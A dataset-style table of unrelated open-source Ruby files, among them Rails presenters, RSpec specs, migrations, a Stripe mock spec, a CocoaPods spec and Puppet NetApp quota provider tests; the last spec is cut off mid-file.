hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
210c63d19e41d2fd6b2407be0fe00a8aaf5604fa | 600 | class PresenterBase
  # Base class for presenters that need to render view-style markup
  # outside of a controller/view context. The ActionView helper modules
  # below are mixed in so helpers like link_to, number_to_currency and
  # javascript_pack_tag work on presenter instances.
  include ActionView::Helpers::FormTagHelper
  include ActionView::Helpers::AssetUrlHelper
  include ActionView::Helpers::NumberHelper
  include ActionView::Helpers::TranslationHelper
  include ActionView::Helpers::UrlHelper
  include ActionView::Helpers::TagHelper
  include Webpacker::Helper
  include ActionView::Context
  include ApplicationHelper
  include DecoratorHelpers
  include Rails.application.routes.url_helpers

  private

  # link_to consults #controller internally; answering nil keeps it from
  # raising when no real controller is present.
  def controller
    nil
  end

  # Evaluates the given block and marks the resulting markup HTML-safe.
  def safe_html
    yield.html_safe
  end
end
| 24 | 50 | 0.791667 |
1c9382b11dd227f63cc6c69135adf8f25d075e30 | 8,327 | # Copyright © 2011-2016 MUSC Foundation for Research Development
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
require 'rails_helper'

RSpec.describe 'dashboard/protocols/summary', type: :view do
  # Renders the summary partial for +protocol+ as the jug2 user with
  # permission to edit; individual examples then assert on +response+.
  def render_summary_for(protocol)
    render 'dashboard/protocols/summary',
           protocol: protocol,
           protocol_type: protocol.type,
           permission_to_edit: true,
           user: jug2
  end

  let_there_be_lane

  context 'Protocol is a Study' do
    it 'should be titled "Study Summary"' do
      protocol = build(:protocol_federally_funded,
                       :without_validations,
                       primary_pi: jug2,
                       type: 'Study',
                       archived: false,
                       short_title: 'My Awesome Short Title')

      render_summary_for protocol

      expect(response).to have_content('Study Summary')
    end

    it 'should display a "Study Notes" button' do
      protocol = build(:protocol_federally_funded,
                       :without_validations,
                       primary_pi: jug2,
                       type: 'Study',
                       archived: false,
                       title: 'Study_Title',
                       short_title: 'Study_Short_Title')

      render_summary_for protocol

      expect(response).to have_selector('button', text: 'Study Notes')
    end

    context 'Study has potential funding source' do
      it 'should display Study ID, Title, Short Title, and potential funding source' do
        protocol = build(:protocol_federally_funded,
                         :without_validations,
                         primary_pi: jug2,
                         type: 'Study',
                         archived: false,
                         title: 'My Awesome Full Title',
                         short_title: 'My Awesome Short Title',
                         id: 9999,
                         potential_funding_source: 'federal',
                         funding_source: 'college',
                         funding_status: 'pending_funding')

        render_summary_for protocol

        expect(response).to have_content('9999')
        expect(response).to have_content('My Awesome Full Title')
        expect(response).to have_content('My Awesome Short Title')
        expect(response).to have_content('Potential Funding Source')
        expect(response).to have_content('Federal')
      end
    end

    context 'Study has a funding source' do
      # Description fixed: a funded study shows the actual funding source,
      # not the potential one.
      it 'should display Study ID, Title, Short Title, and funding source' do
        protocol = build(:protocol_federally_funded,
                         :without_validations,
                         primary_pi: jug2,
                         type: 'Study',
                         archived: false,
                         title: 'My Awesome Full Title',
                         short_title: 'My Awesome Short Title',
                         id: 9999,
                         potential_funding_source: 'federal',
                         funding_source: 'college',
                         funding_status: 'funded')

        render_summary_for protocol

        expect(response).to have_content('9999')
        expect(response).to have_content('My Awesome Full Title')
        expect(response).to have_content('My Awesome Short Title')
        expect(response).not_to have_content('Potential Funding Source')
        expect(response).to have_content('Funding Source')
        expect(response).to have_content('College Department')
      end
    end

    context 'Study is not archived' do
      it 'should display the archive button' do
        protocol = create(:unarchived_study_without_validations, primary_pi: jug2)

        render_summary_for protocol

        expect(response).to have_content('Archive Study')
      end
    end

    context 'Study is archived' do
      # Description fixed: the assertion checks for the Unarchive button.
      it 'should display the unarchive button' do
        protocol = create(:archived_study_without_validations, primary_pi: jug2)

        render_summary_for protocol

        expect(response).to have_content('Unarchive Study')
      end
    end
  end

  context 'Protocol is a Project' do
    it 'should display a "Project Notes" button' do
      protocol = build(:protocol_federally_funded,
                       :without_validations,
                       primary_pi: jug2,
                       type: 'Project',
                       archived: false,
                       title: 'Project_Title',
                       short_title: 'Project_Short_Title')

      render_summary_for protocol

      expect(response).to have_selector('button', text: 'Project Notes')
    end

    it 'should be titled "Project Summary"' do
      protocol = build(:protocol_federally_funded,
                       :without_validations,
                       primary_pi: jug2,
                       type: 'Project',
                       archived: false,
                       short_title: 'My Awesome Short Title')

      render_summary_for protocol

      expect(response).to have_content('Project Summary')
    end

    context 'Project has potential funding source' do
      it 'should display Project ID, Title, Short Title, and potential funding source' do
        protocol = build(:protocol_federally_funded,
                         :without_validations,
                         primary_pi: jug2,
                         type: 'Project',
                         archived: false,
                         title: 'My Awesome Full Title',
                         short_title: 'My Awesome Short Title',
                         id: 9999,
                         potential_funding_source: 'federal',
                         funding_source: 'college',
                         funding_status: 'pending_funding')

        render_summary_for protocol

        expect(response).to have_content('9999')
        expect(response).to have_content('My Awesome Full Title')
        expect(response).to have_content('My Awesome Short Title')
        expect(response).to have_content('Potential Funding Source')
        expect(response).to have_content('Federal')
      end
    end

    context 'Project has a funding source' do
      # Description fixed: a funded project shows the actual funding source,
      # not the potential one.
      it 'should display Project ID, Title, Short Title, and funding source' do
        protocol = build(:protocol_federally_funded,
                         :without_validations,
                         primary_pi: jug2,
                         type: 'Project',
                         archived: false,
                         title: 'My Awesome Full Title',
                         short_title: 'My Awesome Short Title',
                         id: 9999,
                         potential_funding_source: 'federal',
                         funding_source: 'college',
                         funding_status: 'funded')

        render_summary_for protocol

        expect(response).to have_content('9999')
        expect(response).to have_content('My Awesome Full Title')
        expect(response).to have_content('My Awesome Short Title')
        expect(response).not_to have_content('Potential Funding Source')
        expect(response).to have_content('Funding Source')
        expect(response).to have_content('College Department')
      end
    end

    context 'Project is not archived' do
      it 'should display the archive button' do
        protocol = create(:unarchived_project_without_validations, primary_pi: jug2)

        render_summary_for protocol

        expect(response).to have_content('Archive Project')
      end
    end

    context 'Project is archived' do
      # Description fixed: the assertion checks for the Unarchive button.
      it 'should display the unarchive button' do
        protocol = create(:archived_project_without_validations, primary_pi: jug2)

        render_summary_for protocol

        expect(response).to have_content('Unarchive Project')
      end
    end
  end
end
| 36.845133 | 146 | 0.680557 |
08d6d15e5866deb218f689601a75b17861dcc40f | 140 | class RemoveNotesFromMember < ActiveRecord::Migration
# Drops the unused notes column from the members table.
# NOTE(review): `t.remove :notes` without a column type makes this
# migration irreversible on newer Rails (rollback cannot re-create the
# column) — confirm the target Rails version, or supply the type.
def change
change_table :members do |t|
t.remove :notes
end
end
end
| 17.5 | 53 | 0.707143 |
5d071611c1d29b7a9e3760c6fddf0d0c0b7cd438 | 1,082 | module Auth
def current_user
@current_user ||= User.find_by(auth_token: request.headers["Authorization"])
end
def current_company
@current_company ||= Company.find_by(subdomain: subdomain)
end
def require_company!
render json: { errors: "Unspecified company" }, status: :unauthorized unless current_company.present?
end
def authenticate_with_token!
render json: { errors: "Not authenticated" }, status: :unauthorized unless valid_user_signed_in?
end
def valid_user_signed_in?
current_user.present? && current_company.present? && current_user.company == current_company
end
def subdomain
# here we parse domain and check if it is ourcompany.theirs.com or theircompany.ours.com
# I use a gem due to funkiness around TLDs of various lengths
# domain is currently hardcoded for our production app to have name 'change-me', and local to use lvh.me
host = PublicSuffix.parse(request.host)
if host.sld == "change-me" || host.sld == "lvh"
@subdomain = host.trd
else
@subdomain = host.sld
end
end
end
| 30.914286 | 108 | 0.719963 |
1c5a4577af1837958d17c2a50fcd481178ce4faf | 2,774 | require 'spec_helper'
shared_examples 'Balance Transaction API' do
  let(:stripe_helper) { StripeMock.create_test_helper }

  it "returns an error if balance transaction does not exist" do
    txn_id = 'txn_xxxxxxxxxxxxxxxxxxxxxxxx'
    expect {
      Stripe::BalanceTransaction.retrieve(txn_id)
    }.to raise_error { |e|
      expect(e).to be_a(Stripe::InvalidRequestError)
      expect(e.message).to eq('No such balance_transaction: ' + txn_id)
    }
  end

  it "retrieves a single balance transaction" do
    txn_id = 'txn_05RsQX2eZvKYlo2C0FRTGSSA'
    txn = Stripe::BalanceTransaction.retrieve(txn_id)
    expect(txn).to be_a(Stripe::BalanceTransaction)
    expect(txn.id).to eq(txn_id)
  end

  describe "listing balance transactions" do
    it "retrieves all balance transactions" do
      # Renamed from `disputes`: these are balance transactions.
      transactions = Stripe::BalanceTransaction.all
      expect(transactions.count).to eq(10)
      expect(transactions.map(&:id)).to include('txn_05RsQX2eZvKYlo2C0FRTGSSA', 'txn_15RsQX2eZvKYlo2C0ERTYUIA', 'txn_25RsQX2eZvKYlo2C0ZXCVBNM', 'txn_35RsQX2eZvKYlo2C0QAZXSWE', 'txn_45RsQX2eZvKYlo2C0EDCVFRT', 'txn_55RsQX2eZvKYlo2C0OIKLJUY', 'txn_65RsQX2eZvKYlo2C0ASDFGHJ', 'txn_75RsQX2eZvKYlo2C0EDCXSWQ', 'txn_85RsQX2eZvKYlo2C0UJMCDET', 'txn_95RsQX2eZvKYlo2C0EDFRYUI')
    end
  end

  it 'retrieves balance transactions for an automated transfer' do
    transfer_id = Stripe::Transfer.create({ amount: 2730, currency: "usd" })
    # verify transfer currently has no balance transactions
    transfer_transactions = Stripe::BalanceTransaction.all({ transfer: transfer_id })
    expect(transfer_transactions.count).to eq(0)
    # verify we can create a new balance transaction associated with the transfer
    new_txn_id = stripe_helper.upsert_stripe_object(:balance_transaction, { amount: 12300, transfer: transfer_id })
    new_txn = Stripe::BalanceTransaction.retrieve(new_txn_id)
    expect(new_txn).to be_a(Stripe::BalanceTransaction)
    expect(new_txn.amount).to eq(12300)
    # although transfer was specified as an attribute on the balance_transaction, it should not be returned in the object
    expect { new_txn.transfer }.to raise_error(NoMethodError)
    # verify we can update an existing balance transaction to associate with the transfer
    existing_txn_id = 'txn_05RsQX2eZvKYlo2C0FRTGSSA'
    existing_txn = Stripe::BalanceTransaction.retrieve(existing_txn_id)
    stripe_helper.upsert_stripe_object(:balance_transaction, { id: existing_txn_id, transfer: transfer_id })
    # now verify that only these balance transactions are retrieved with the transfer
    transfer_transactions = Stripe::BalanceTransaction.all({ transfer: transfer_id })
    expect(transfer_transactions.count).to eq(2)
    expect(transfer_transactions.map(&:id)).to include(new_txn_id, existing_txn_id)
  end
end
| 43.34375 | 361 | 0.769647 |
ac54989aeb41a8aad31b881d67103b3feaec5281 | 103 | module Contact
# Abstract base record for models in the Contact namespace
# (engine-style ApplicationRecord; never instantiated directly).
class ApplicationRecord < ActiveRecord::Base
self.abstract_class = true
end
end
| 17.166667 | 46 | 0.76699 |
e82abdbf99151d98f18ae3583b402fb1297277a1 | 334 | Puppet::Type.type(:neutron_vpnaas_agent_config).provide(
:ini_setting,
:parent => Puppet::Type.type(:openstack_config).provider(:ini_setting)
) do
# Puppet ini_setting provider managing entries in the neutron VPNaaS
# agent configuration file.

# Path of the managed INI file.
def self.file_path
'/etc/neutron/vpn_agent.ini'
end
# added for backwards compatibility with older versions of inifile
def file_path
self.class.file_path
end
end
| 20.875 | 72 | 0.745509 |
bb61ca413a33c441e46465cf7a888cb8f6247ebe | 431 | # frozen_string_literal: true
module Heroku
  #
  # Job that handles background (asynchronous) provisioning.
  #
  # @raise [Heroku::ProvisioningError] if some provisioning step failed.
  #
  class ProvisioningJob < ApplicationJob
    # Looks up the resource by id and hands it to the provisioner.
    # A falsy result from the provisioner is treated as failure.
    def perform(resource_id)
      resource = Resource.find(resource_id)
      provisioned = Heroku::ProvisioningManager::ResourceProvisioner.call(resource)
      raise Heroku::ProvisioningError unless provisioned
    end
  end
end
| 26.9375 | 108 | 0.756381 |
87bb72d270687f95111b69c689b16e62812695fa | 809 | Pod::Spec.new do |s|
# CocoaPods spec for iRate, a rate-this-app prompt library.
# NOTE(review): the version string appears both in s.version and in the
# source tag — keep them in sync when bumping.
s.name = 'iRate'
s.version = '1.6.2'
s.license = 'zlib'
s.summary = 'Alternative to Appirater (prompts users to rate the application) with a simpler interface and support for iOS fast application switching.'
s.description = 'A handy class that prompts users of your iPhone or Mac App Store app to rate your application after using it for a while. Similar to Appirater, but with a simpler, cleaner interface and automatic support for iOS fast application switching.'
s.homepage = 'http://charcoaldesign.co.uk/source/cocoa#irate'
s.author = 'Nick Lockwood'
s.source = { :git => 'https://github.com/nicklockwood/iRate.git', :tag => '1.6.2' }
s.source_files = 'iRate/iRate.{h,m}'
s.resources = 'iRate/iRate.bundle'
end
| 62.230769 | 261 | 0.674907 |
5debeca146c06a9c107eefa503f3d2ef877b036f | 507 | cask 'dragthing' do
# Homebrew Cask definition for the DragThing dock application.
version '5.9.17'
sha256 '62d553878267d617aa2be48f09dfc401d08afce216cd42aef7441f4f95dd4cff'
# amazonaws.com/tlasystems was verified as official when first introduced to the cask
url "https://s3.amazonaws.com/tlasystems/DragThing-#{version}.dmg"
appcast 'http://www.dragthing.com/english/download.html',
checkpoint: '2f4f10b7778cbc2ce8198bafdc1e63cd0edb626054926cf25eb20325ea206c6d'
name 'DragThing'
homepage 'http://www.dragthing.com/'
app 'DragThing.app'
end
| 36.214286 | 88 | 0.779093 |
e20db78b4abe8a4a602cd760b8e636a177f857ac | 837 | # Be sure to restart your server when you modify this file.
# Add new inflection rules using the following format. Inflections
# are locale specific, and you may define rules for as many different
# locales as you wish. All of these examples are active by default:
# ActiveSupport::Inflector.inflections(:en) do |inflect|
# inflect.plural /^(ox)$/i, '\1en'
# inflect.singular /^(ox)en/i, '\1'
# inflect.irregular 'person', 'people'
# inflect.uncountable %w( fish sheep )
# end
# These inflection rules are supported but not enabled by default:
# ActiveSupport::Inflector.inflections(:en) do |inflect|
# inflect.acronym 'RESTful'
# end
ActiveSupport::Inflector.inflections do |inflect|
  # Portuguese plurals the default English rules would get wrong.
  {
    'qualificacao' => 'qualificacoes',
    'receita' => 'receitas',
    'franquia' => 'franquias'
  }.each { |singular, plural| inflect.irregular(singular, plural) }
end
| 36.391304 | 69 | 0.744325 |
edaa47c9c857608cca7c2fc759a46fd549057d3f | 48 | module ObzidianViewTool
# Gem version constant.
VERSION = "0.1.0"
end
| 12 | 23 | 0.729167 |
016b5f89b0667272cc136ab0e82014fcb8a4f737 | 1,309 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2018_07_18_212541) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "calls", force: :cascade do |t|
t.string "from", null: false
t.string "to", null: false
t.string "status", null: false
t.string "call_control_id", null: false
t.string "call_leg_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "direction"
# NOTE(review): this index covers call_control_id but is named
# "index_calls_on_call_leg_id" — likely a leftover from a column rename;
# fix via a migration, not by editing this generated file.
t.index ["call_control_id"], name: "index_calls_on_call_leg_id"
end
end
6268ef13a07c5537c32c6147799ef2d5eb1f6f62 | 405 | # boolean_and - class BooleanAnd - implements && operator
# AST node representing the short-circuiting boolean AND of two
# sub-expressions. Both operands respond to #call(env:, frames:) and #to_s.
class BooleanAnd
  attr_reader :line_number

  def initialize(left, right, line_number = 0)
    @left = left
    @right = right
    @line_number = line_number
  end

  # Evaluates the left operand first; the right operand only runs when the
  # left is truthy (native && semantics).
  def call(env:, frames:)
    @left.call(env: env, frames: frames) &&
      @right.call(env: env, frames: frames)
  end

  def to_s
    "#{@left} && #{@right}"
  end
end
| 20.25 | 57 | 0.641975 |
628505e22efc5ef924d2dba65ef83abcb5b7d897 | 749 | # frozen_string_literal: true
module Stupidedi
module Versions
module FunctionalGroups
module FortyTen
module SegmentDefs
# Short aliases used throughout the segment definitions in this module.
s = Schema
e = ElementDefs
r = ElementReqs
# X12 4010 PLD segment definition: pallet information (quantity,
# exchange, weight). Element requirements follow the standard; the
# P(3,4) syntax note pairs elements 3 and 4 (if one is present, both
# must be).
PLD = s::SegmentDef.build(:PLD, "Pallet Information",
"To specify pallet information including quantity, exchange, and weight",
e::E406 .simple_use(r::Mandatory, s::RepeatCount.bounded(1)),
e::E399 .simple_use(r::Optional, s::RepeatCount.bounded(1)),
e::E188 .simple_use(r::Relational, s::RepeatCount.bounded(1)),
e::E81 .simple_use(r::Relational, s::RepeatCount.bounded(1)),
SyntaxNotes::P.build(3, 4))
end
end
end
end
end
| 28.807692 | 85 | 0.602136 |
f7a4a30c0e3b9c6a6cb99df9f2317a892d8bc283 | 4,496 | RSpec.describe KOSapiCLI::KOSapiTokenLoader do
# Specs for KOSapiTokenLoader: persisting/restoring OAuth token data in a
# YAML "env" file (a throwaway path under /tmp is used in these tests).
# Fixtures: 'valid' expires in the future, 'invalid' is already expired,
# 'broken' has the wrong shape entirely.
let(:broken) do
{ 'broken' => { 'env' => 'file' } }
end
let(:valid) do
{ 'config' => { 'client_token' => { 'access_token' => 'fas4f68sef486sef4',
                                    'refresh_token' => '',
                                    'expires_at' => (Time.now.to_i + 1000),
                                    'token_type' => 'bearer',
                                    'scope' => 'cvut:kosapi:read' } } }
end
let(:invalid) do
{ 'config' => { 'client_token' => { 'access_token' => 'fas4f68sef486sef4',
                                    'refresh_token' => '',
                                    'expires_at' => (Time.now.to_i - 1000),
                                    'token_type' => 'bearer',
                                    'scope' => 'cvut:kosapi:read' } } }
end
let(:config) do
KOSapiCLI::Configuration.new(env_file: '/tmp/.kosapi_cli.env')
end
subject(:loader) do
KOSapiCLI::KOSapiTokenLoader.new(config)
end
# Reading a previously stored token back from the env file.
describe '#restore_token' do
# NOTE(review): the description wording "does not file exist" is a typo
# in the example group name (string, left unchanged here).
context '.kosapi_cli.env does not file exist' do
it 'should try to read from .env file' do
expect(File).to receive(:open).with(config.env_file, 'r')
loader.restore_token
end
it 'should return nil if env file does not exist' do
expect(loader.restore_token).to be_nil
end
end
context '.kosapi_cli.env does exists but contains not valid data' do
before(:each) { write_yaml_env(config.env_file, broken) }
after(:each) { File.delete(config.env_file) }
it 'should read from .env file' do
expect(File).to receive(:open).with(config.env_file, 'r')
loader.restore_token
end
it 'should return nil if env file is broken' do
expect(loader.restore_token).to be_nil
end
end
context 'valid token in .kosapi_cli.env file' do
before(:each) { write_yaml_env(config.env_file, valid) }
after(:each) { File.delete(config.env_file) }
it 'should read from .env file' do
expect(File).to receive(:open).with(config.env_file, 'r')
loader.restore_token
end
it 'should return hash' do
expect(loader.restore_token).to be_a Hash
end
it 'should contain stored data' do
expect(loader.restore_token).to eq valid['config']['client_token']
end
end
context 'invalid token in .kosapi_cli.env file' do
before(:each) { write_yaml_env(config.env_file, invalid) }
after(:each) { File.delete(config.env_file) }
it 'should read from .env file' do
expect(File).to receive(:open).with(config.env_file, 'r')
loader.restore_token
end
it 'should return nil if token is not valid' do
expect(loader.restore_token).to be_nil
end
end
end
# Writing a token out to the env file (creating it or updating in place).
describe '#store_token' do
context '.kosapi_cli.env does not exists' do
it 'should read and write into env file' do
expect(File).to receive(:open).with(config.env_file, 'r')
expect(File).to receive(:open).with(config.env_file, 'w')
loader.store_token(valid['config']['client_token'])
end
it 'should create env file' do
expect(File.file?(config.env_file)).to be false
loader.store_token(valid['config']['client_token'])
expect(File.file?(config.env_file)).to be true
end
it 'should store data that was given' do
loader.store_token(valid['config']['client_token'])
test = {}
File.open(config.env_file, 'r') do |f|
test = YAML.safe_load(f)
end
expect(valid['config']['client_token']).to eq(test['config']['client_token'])
end
end
context '.kosapi_cli.env does already exists' do
before(:each) { write_yaml_env(config.env_file, valid) }
after(:each) { File.delete(config.env_file) }
it 'should read and write into env file' do
expect(File).to receive(:open).with(config.env_file, 'r')
expect(File).to receive(:open).with(config.env_file, 'w')
loader.store_token(valid['config']['client_token'])
end
it 'should store data that was given' do
loader.store_token(valid['config']['client_token'])
test = {}
File.open(config.env_file, 'r') do |f|
test = YAML.safe_load(f)
end
expect(valid['config']['client_token']).to eq(test['config']['client_token'])
end
end
end
end
| 33.552239 | 85 | 0.581628 |
ac182e8b45737731d684b7dbee671505c19365bb | 246 | FactoryBot.define do
# Builds a Telemetry::Engine::Spool with an associated engine, a
# sequential spool number, and a random rotational velocity (rand in
# [0, 1) scaled to at most 30,000 rpm via the Unit wrapper).
factory :telemetry_engine_spool, class: 'Telemetry::Engine::Spool' do
association :engine, factory: :telemetry_engine
sequence :number
n { rand }
rotational_velocity { Unit.new n * 30000, 'rpm' }
end
end
| 24.6 | 71 | 0.707317 |
4a415b42a0810a31b7bb171eee4645a4cea8dddd | 16,091 | #! /usr/bin/env ruby
require 'spec_helper'
require 'yaml'
require 'puppet/util/network_device/netapp/NaServer'
describe Puppet::Type.type(:netapp_quota).provider(:sevenmode) do
  # Unit specs for the sevenmode provider of netapp_quota.
  # Fixes applied: removed a leftover `require 'pry'` / `binding.pry`
  # debugging breakpoint (would hang any non-interactive test run) and
  # dropped dead commented-out duplicates of the active let blocks.
  before :each do
    provider.stubs(:suitable?).returns true
    Puppet::Type.type(:netapp_quota).stubs(:defaultprovider).returns provider
  end

  let(:parameters) do
    { :name => '/vol/vol1/qtree1' }
  end

  let(:resource) do
    Puppet::Type.type(:netapp_quota).new(parameters.merge({
      :provider => described_class.name
    }))
  end

  let(:provider) do
    resource.provider
  end

  let(:tree_quota_parameters) do
    {
      :name => '/vol/vol1/qtree1',
      :ensure => :present,
      :volume => 'vol1',
      :type => :tree,
    }
  end

  let(:user_quota_parameters) do
    {
      :name => 'bob',
      :ensure => :present,
      :volume => 'vol1',
      :qtree => 'qtree1',
      :type => :user,
    }
  end

  let(:group_quota_parameters) do
    {
      :name => 'staff',
      :ensure => :present,
      :volume => 'vol1',
      :qtree => 'qtree1',
      :type => :group,
    }
  end

  describe "#size_in_byte" do
    it "should convert a value with no unit to an integer" do
      described_class.size_in_byte("1024").should == 1024
    end

    it "should convert a value specified in KiB (unit=K)" do
      described_class.size_in_byte("100K").should == 102400
    end

    it "should convert a value specified in MiB (unit=M)" do
      described_class.size_in_byte("3M").should == 3145728
    end

    it "should convert a value specified in GiB (unit=G)" do
      described_class.size_in_byte("20G").should == 21474836480
    end

    it "should convert a value specified in TiB (unit=T)" do
      described_class.size_in_byte("4T").should == 4398046511104
    end

    it "should raise an error on negative values" do
      expect { described_class.size_in_byte("-20") }.to raise_error(ArgumentError, 'Invalid input "-20"')
    end

    it "should raise an error for unknown units" do
      expect { described_class.size_in_byte("3R") }.to raise_error(ArgumentError, 'Invalid input "3R"')
    end

    it "should raise an error on non numeric values" do
      expect { described_class.size_in_byte("G") }.to raise_error(ArgumentError, 'Invalid input "G"')
    end
  end

  describe "#instances" do
    it "should return an array of current quota entries" do
      described_class.expects(:list).with('include-output-entry', 'true').returns YAML.load_file(my_fixture('quota-list-entries.yml'))
      instances = described_class.instances
      instances.size.should == 3
      instances.map do |prov|
        {
          :name => prov.get(:name),
          :ensure => prov.get(:ensure),
          :qtree => prov.get(:qtree),
          :type => prov.get(:type),
          :disklimit => prov.get(:disklimit),
          :softdisklimit => prov.get(:softdisklimit),
          :filelimit => prov.get(:filelimit),
          :softfilelimit => prov.get(:softfilelimit),
          :threshold => prov.get(:threshold),
          :volume => prov.get(:volume)
        }
      end.should == [
        {
          :name => '/vol/FILER01P_vol1/some-share',
          :ensure => :present,
          :qtree => :absent,
          :type => :tree,
          :disklimit => 5368709120, # 5G
          :softdisklimit => :absent,
          :filelimit => :absent,
          :softfilelimit => :absent,
          :threshold => :absent,
          :volume => 'FILER01P_vol1'
        },
        {
          :name => '/vol/vol3/some_other-share',
          :ensure => :present,
          :qtree => :absent,
          :type => :tree,
          :disklimit => 200 * 1024 * 1024, # 200M
          :softdisklimit => :absent,
          :filelimit => :absent,
          :softfilelimit => :absent,
          :threshold => :absent,
          :volume => 'vol3'
        },
        {
          :name => 'bob',
          :ensure => :present,
          :qtree => 'bob_h',
          :type => :user,
          :disklimit => 100*1024*1024, # 100M
          :softdisklimit => 90*1024*1024, # 90M
          :filelimit => 10240, # 10K
          :softfilelimit => 9*1024, # 9K
          :threshold => 90*1024*1024, # 90M
          :volume => 'home'
        }
      ]
    end
  end

  context 'on a tree quota' do
    let(:parameters) do
      tree_quota_parameters
    end

    describe "when asking exists?" do
      it "should return true if resource is present" do
        resource.provider.set(:ensure => :present)
        resource.provider.should be_exists
      end

      it "should return false if resource is absent" do
        resource.provider.set(:ensure => :absent)
        resource.provider.should_not be_exists
      end
    end

    describe "when creating a resource" do
      it "should be able to create a tree resource" do
        resource.provider.expects(:add).with('quota-target', '/vol/vol1/qtree1', 'quota-type', 'tree', 'volume', 'vol1', 'qtree', '')
        resource.provider.create
      end

      # Disk-size limits are passed to the API in KiB.
      {
        :disklimit => 'disk-limit',
        :softdisklimit => 'soft-disk-limit',
        :threshold => 'threshold'
      }.each do |limit_property, api_property|
        describe "with a #{limit_property}" do
          {
            'absent' => '-',
            '300K' => '300',
            '20M' => '20480',
            '3G' => '3145728',
            '1T' => '1073741824'
          }.each do |limit_value, api_value|
            it "should pass #{api_value} if desired value is #{limit_value}" do
              resource[limit_property] = limit_value
              resource.provider.expects(:add).with('quota-target', '/vol/vol1/qtree1', 'quota-type', 'tree', 'volume', 'vol1', 'qtree', '', api_property, api_value)
              resource.provider.create
            end
          end
        end
      end

      # File-count limits are passed to the API as plain counts.
      {
        :filelimit => 'file-limit',
        :softfilelimit => 'soft-file-limit'
      }.each do |limit_property, api_property|
        describe "with a #{limit_property}" do
          {
            'absent' => '-',
            '300' => '300',
            '2K' => '2048',
            '30M' => '31457280',
            '5G' => '5368709120',
            '1T' => '1099511627776'
          }.each do |limit_value, api_value|
            it "should pass #{api_value} if desired value is #{limit_value}" do
              resource[limit_property] = limit_value
              resource.provider.expects(:add).with('quota-target', '/vol/vol1/qtree1', 'quota-type', 'tree', 'volume', 'vol1', 'qtree', '', api_property, api_value)
              resource.provider.create
            end
          end
        end
      end
    end
  end

  describe "when destroying a resource" do
    context "on a tree quota" do
      let(:parameters) do
        tree_quota_parameters
      end

      it "should be able to destroy it" do
        # if we destroy a provider, we must have been present before so we must have values in @property_hash
        resource.provider.set(:type => :tree, :volume => 'vol1')
        resource.provider.expects(:del).with('quota-target', '/vol/vol1/qtree1', 'quota-type', 'tree', 'volume', 'vol1', 'qtree', '')
        resource.provider.destroy
      end
    end

    context "on a user quota" do
      let(:parameters) do
        user_quota_parameters
      end

      it "should be able to destroy it" do
        # if we destroy a provider, we must have been present before so we must have values in @property_hash
        resource.provider.set(:name => 'bob', :type => :user, :volume => 'vol1', :qtree => 'q1')
        resource.provider.expects(:del).with('quota-target', 'bob', 'quota-type', 'user', 'volume', 'vol1', 'qtree', 'q1')
        resource.provider.destroy
      end
    end

    # Unified to `context` for consistency with the sibling groups above.
    context "on a group quota" do
      let(:parameters) do
        group_quota_parameters
      end

      it "should be able to destroy it" do
        # if we destroy a provider, we must have been present before so we must have values in @property_hash
        resource.provider.set(:name => 'staff', :type => :group, :volume => 'vol1', :qtree => 'q1')
        resource.provider.expects(:del).with('quota-target', 'staff', 'quota-type', 'group', 'volume', 'vol1', 'qtree', 'q1')
        resource.provider.destroy
      end
    end
  end

  describe "when querying the current value of a property" do
    {
      :type => :tree,
      :volume => 'vol1',
      :qtree => 'qtree1',
      :disklimit => 500,
      :softdisklimit => 300,
      :filelimit => 100,
      :softfilelimit => 50,
      :threshold => 20
    }.each do |property, sample_value|
      describe "for #{property}" do
        it "should get the cached value if possible" do
          provider.set(property => sample_value)
          provider.send(property).should == sample_value
        end

        it "should return absent otherwise" do
          provider.send(property).should == :absent
        end
      end
    end
  end

  describe "when modifying a property" do
    [:type, :volume, :qtree].each do |immutable_prop|
      describe immutable_prop do
        it "should not allow setting #{immutable_prop}" do
          expect { provider.send("#{immutable_prop}=", "some_value") }.to raise_error(Puppet::Error, /Please perform the necessary steps manually/)
        end
      end
    end

    {
      :disklimit => 'disk-limit',
      :softdisklimit => 'soft-disk-limit',
      :threshold => 'threshold'
    }.each do |property, apiproperty|
      describe property do
        context "on a user quota" do
          let(:parameters) do
            user_quota_parameters
          end

          it "should pass \"-\" as a value for #{apiproperty} if desired value is absent" do
            resource.provider.set(:name => 'bob', :type => :user, :qtree => 'qtree01', :volume => 'vol01')
